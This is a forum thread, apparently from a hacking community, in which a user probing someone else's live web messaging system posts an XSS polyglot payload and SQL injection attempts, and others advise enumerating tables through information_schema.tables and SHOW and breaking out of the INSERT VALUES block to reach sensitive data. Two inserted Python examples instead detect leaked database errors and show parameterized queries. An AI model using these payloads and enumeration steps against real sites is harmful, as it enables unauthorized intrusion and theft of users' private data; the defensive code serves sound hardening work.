
XSS Help.


ghost's Avatar
0 0

Ok, so I've found a hole in a web page that doesn't need detailing. I used this code: `';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>` and the appropriate box shows up saying 'XSS', telling me the page is vuln to XSS. But I also got an OLE DB error, giving me a DB footprint on the page. I know I can execute JS commands with XSS, but my question is, can I execute SQL commands with XSS?


ghost's Avatar
0 0

Yeah you can, it's called SQL Injection.


ghost's Avatar
0 0

Well, it depends on the error…


spyware's Avatar
Banned
0 0

Obviously the input passes through a database. The XSS you're getting is just icing. I'd focus on injecting SQL commands, it might be a possibility (depending NOT on the error message but rather the way the input is used).


ghost's Avatar
0 0

Of course, the error message depends on the input! lol


spyware's Avatar
Banned
0 0

454447415244 wrote: Of course, the error message depends on the input! lol

Could be the case, yeah. What also could be the case is that the script outputs random (fake) errors to confuse hackers.


ghost's Avatar
0 0

This is the error I get when I input the XSS (after the JS box saying 'XSS' pops up):


```
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\' at line 1

/W1/Pidgeon.asp, line 74
```

This is being injected into a sort of PM system for the web app. It seems as if this is directly affecting the GET and INSERT functions. What I really want to know, though, is there any way to get sensitive info from this?
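A check that goes with the error dump above, added here as an example and not code from the thread or the site being discussed: it flags HTTP response bodies in which a database error has reached the client and records what that error disclosed (provider error code, ODBC driver and server version, script path and line). The sample responses are constructed from the text quoted in the thread; the path `/W1/Inbox.asp` and the `audit_responses` helper are made up for the demo. A site owner can run it over captured responses or a proxy's body log to find pages that need a generic error handler.

```python
"""Added example (not from the thread or the site it discusses): flag HTTP
responses that hand a database error to the client, and record what leaked.
The sample responses below are constructed from the error text quoted above."""
import html
import re

# Stable strings from the error shown in the thread (ODBC provider, MySQL parser)
OLE_DB_ERROR = re.compile(r"Microsoft OLE DB Provider for ODBC Drivers error '([0-9A-Fa-f]{8})'")
MYSQL_SYNTAX = re.compile(r"You have an error in your SQL syntax")
# Details a verbose error page leaks alongside the error itself
MYSQL_BANNER = re.compile(r"\[MySQL\]\[ODBC ([\d.]+) Driver\]\[mysqld-([^\]]+)\]")
ASP_LOCATION = re.compile(r"(/[^\s,<>]+\.asp), line (\d+)")


def find_db_error_disclosure(body):
    """Return a dict describing the disclosure, or None if the body is clean.
    Entities are decoded first: classic ASP error pages often arrive with the
    quotes as &#39;, which would otherwise defeat the literal match."""
    text = html.unescape(body)
    finding = {}
    m = OLE_DB_ERROR.search(text)
    if m:
        finding["provider_error"] = m.group(1)
    if MYSQL_SYNTAX.search(text):
        finding["mysql_syntax_error"] = True
    if not finding:
        return None
    m = MYSQL_BANNER.search(text)
    if m:
        finding["odbc_driver"], finding["server_version"] = m.group(1), m.group(2)
    m = ASP_LOCATION.search(text)
    if m:
        finding["script"], finding["line"] = m.group(1), int(m.group(2))
    return finding


def audit_responses(responses):
    """responses: iterable of (url, body). Returns [(url, finding), ...] for
    every response that disclosed a database error."""
    results = []
    for url, body in responses:
        finding = find_db_error_disclosure(body)
        if finding:
            results.append((url, finding))
    return results


# Constructed samples: the first mirrors the error page quoted in the thread
# (entity-encoded, as it appears later in the thread); the second is a
# hypothetical clean reply from a made-up page.
SAMPLE_RESPONSES = [
    ("/W1/Pidgeon.asp",
     "<html><body>Microsoft OLE DB Provider for ODBC Drivers error &#39;80040e14&#39;<br>"
     "[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; "
     "check the manual that corresponds to your MySQL server version for the right syntax "
     "to use near &#39;...&#39; at line 1<br>/W1/Pidgeon.asp, line 74</body></html>"),
    ("/W1/Inbox.asp", "<html><body>Message sent.</body></html>"),
]

if __name__ == "__main__":
    for url, finding in audit_responses(SAMPLE_RESPONSES):
        print(url, finding)
```

Anything this flags is a page whose exception handler should be replaced with a generic client message plus server-side logging; the recorded driver, server version and script location are exactly the "DB footprint" the first post refers to.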


ghost's Avatar
0 0

Narc0tiX wrote: This is the error I get when I input the XSS (after the JS box saying 'XSS' pops up):

```
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\' at line 1

/W1/Pidgeon.asp, line 74
```

This is being injected into a sort of PM system for the web app. It seems as if this is directly affecting the GET and INSERT functions. What I really want to know, though, is there any way to get sensitive info from this?

l0l, it is vulnerable to SQL Injection! :happy:

@spyware yeah, but what an ideal system is this! lol It might be the case, but usually vulnerabilities are found in places where the webmaster wasn't aware of! ;) unless he's a dumb ass web developer! :p


ghost's Avatar
0 0

Well, he's a one man army. I'm pretty sure he's the only developer. He had staff before, but they all resigned.

Are you sure it's vuln to SQL pwn? 'Cuz I injected XSS with JS, not SQL…


ghost's Avatar
0 0

Ok, so it's VERY vuln to SQL injection. But I have another question: what's the best way to find table names? I tried `\' 1' AND 1=(SELECT COUNT(*) FROM tablenames); --` but I get

```
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' AND 1=(SELECT COUNT(*) FROM tablenames); --')' at line 1

/W1/Pidgeon.asp, line 74
```

Which really isn't any info that is useful or relevant to the command...

ghost's Avatar
0 0

You could try information_schema.tables or DESCRIBE. Use Intellitamper to find out everything you can about the site. For instance, I was just looking through some files on this one site and found a bunch of table names and descriptions. You never know what you might find. ;)


ghost's Avatar
0 0

Yeah, I just used Intellitamper. I found the script that assigns the cookie values, but that's about it. The dev must've hidden the rest.


ghost's Avatar
0 0

Then try information_schema.tables or try to guess it.


ghost's Avatar
0 0

Skunkfoot wrote: You could try information_schema.tables or DESCRIBE.

Not DESCRIBE… that's for when you know the table name and want to know the table fields, types, etc. The other way to discover table names (other than information_schema.tables) would be SHOW. Love that command.


ghost's Avatar
0 0

Ok, so I inject SQL that contains a \ (backslash) and a ' (single quote) to escape filters. But every time, I get an error bitching about the syntax associated with the backslash and single quote. But when I don't include either one of the two, it sends the PM and the page loads normally. Any idea on how to mark up my commands in order to get what I desire?


ghost's Avatar
0 0

@Zephyr: Now that I think about it, that makes a lot more sense. >.<

@Other Guy: Post the error? Often times the error message contains useful information.


ghost's Avatar
0 0

I get this:

```
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SHOW table_name FROM information_schema.tables''')' at line 1

/W1/Pidgeon.asp, line 74
```

After inputting this: `\'SHOW table_name FROM information_schema.tables'`

ghost's Avatar
0 0

Looks like you'd need to escape from the VALUES block before you could attempt your injection; otherwise, your query will cause an error because it's still part of the INSERT. Also, from the error message you're getting, you can see how your apostrophe is being "escaped"… so, it looks like you're doing that right.
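The fix for the situation the last reply describes, as an added example rather than code from the thread or the site: the PM insert written two ways. It uses Python's sqlite3 in place of the MySQL-over-ODBC backend the errors show (an assumption made so the demo runs offline), and the `pm` table and its columns are invented. The concatenated version fails whenever the body contains a quote, which is the '80040e14' syntax error the thread keeps hitting, while the parameterized version stores quotes and backslashes as plain data; the handler also sends the client a generic message and keeps the database error server-side.

```python
"""Added example (not from the thread): string-concatenated INSERT beside a
parameterized one. sqlite3 stands in for the MySQL/ODBC backend (assumption);
the pm table and its columns are made up for the demo."""
import sqlite3


def make_db():
    """In-memory table with a hypothetical PM schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pm (id INTEGER PRIMARY KEY, sender TEXT, body TEXT)")
    return conn


def insert_pm_concat(conn, sender, body):
    """Vulnerable pattern: user input is spliced into the SQL text. A quote in
    `body` ends the string literal early, so the statement no longer parses;
    that is the failure mode behind the syntax errors quoted in the thread."""
    sql = "INSERT INTO pm (sender, body) VALUES ('" + sender + "', '" + body + "')"
    conn.execute(sql)
    conn.commit()


def insert_pm_param(conn, sender, body):
    """Hardened pattern: the SQL text is fixed and the values travel separately,
    so quotes and backslashes are stored as data and never parsed as SQL.
    No escaping step is needed, which is what makes this stronger than filters."""
    conn.execute("INSERT INTO pm (sender, body) VALUES (?, ?)", (sender, body))
    conn.commit()


def send_pm(conn, sender, body, use_params):
    """Request-handler shape: returns (http_status, client_message, server_log).
    The database error text goes to the server log slot only; the client sees
    a generic message, so no driver, version or script path is disclosed."""
    try:
        if use_params:
            insert_pm_param(conn, sender, body)
        else:
            insert_pm_concat(conn, sender, body)
        return 200, "Message sent.", None
    except sqlite3.Error as exc:
        return 500, "Could not send message.", "db error: %s" % exc


def stored_bodies(conn):
    """Bodies in insertion order, to show what actually reached the table."""
    return [row[0] for row in conn.execute("SELECT body FROM pm ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    print(send_pm(db, "alice", "O'Reilly", use_params=False))   # 500 + logged error
    print(send_pm(db, "alice", "O'Reilly", use_params=True))    # 200, stored intact
    print(stored_bodies(db))
```

With parameters in place the quote-and-backslash inputs the thread wrestles with are simply message text, and the error page that started the thread never gets a chance to render.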